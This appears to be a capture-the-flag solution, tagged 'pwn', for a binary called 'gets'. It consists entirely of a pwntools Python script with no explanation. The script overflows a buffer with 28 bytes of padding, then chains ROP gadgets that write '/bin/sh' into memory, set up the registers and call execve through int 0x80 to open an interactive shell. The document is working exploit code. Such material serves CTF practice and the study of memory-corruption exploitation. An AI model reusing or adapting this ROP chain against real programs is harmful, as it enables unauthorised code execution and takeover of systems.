Tags: pwn
Rating:
```python
#!/usr/bin/python
from pwn import *
r = process('./gets')
elf = ELF('./gets')
gadget = 0x080549db # mov dword ptr [edx], eax ; ret
popeax = 0x080b81c6 # pop eax ; ret
popedx = 0x0806f02a # pop edx ; ret
popedcbx = 0x0806f050 # pop edx ; pop ecx ; pop ebx ; ret
int0x80 = 0x0806cc25 # int 0x80
mem = 0x80ea060 # stack write address
payload = "A"*28
payload += p32(popedx)
payload += p32(mem)
payload += p32(popeax)
payload += '/bin'
payload += p32(gadget)
payload += p32(popedx)
payload += p32(mem+4)
payload += p32(popeax)
payload += '/sh\x00'
payload += p32(gadget)
payload += p32(popedcbx)
payload += p32(0)
payload += p32(0)
payload += p32(mem)
payload += p32(popeax)
payload += p32(0xb)
payload += p32(int0x80)
r.sendlineafter('\n', payload)
r.interactive()
```
